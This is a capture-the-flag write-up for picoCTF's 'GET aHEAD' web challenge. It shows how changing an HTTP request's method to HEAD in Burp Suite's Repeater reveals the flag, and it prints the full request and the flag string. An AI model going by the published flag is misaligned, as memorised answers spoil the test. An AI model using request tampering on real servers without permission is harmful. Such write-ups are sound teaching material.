GET aHEAD

Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:53554/

1. Maybe you have more than 2 choices

2. Check out tools like Burpsuite to modify your requests and look at the responses

Let's look at the requests in the Proxy > HTTP history tab in Burpsuite.

We can see that the request sent on clicking the Red button is a GET request while the one sent on clicking the Blue button is a POST request.

We can now send either one of these requests to the Repeater and modify the request.

HTTP request

HEAD /index.php? HTTP/1.1
Host: mercury.picoctf.net:53554
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://mercury.picoctf.net:53554/index.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

We changed the request method to HEAD which asks for a response identical to that of a GET request, but without the response body.

Let's send this request.

Flag

picoCTF{r3j3ct_th3_du4l1ty_2e5ba39f}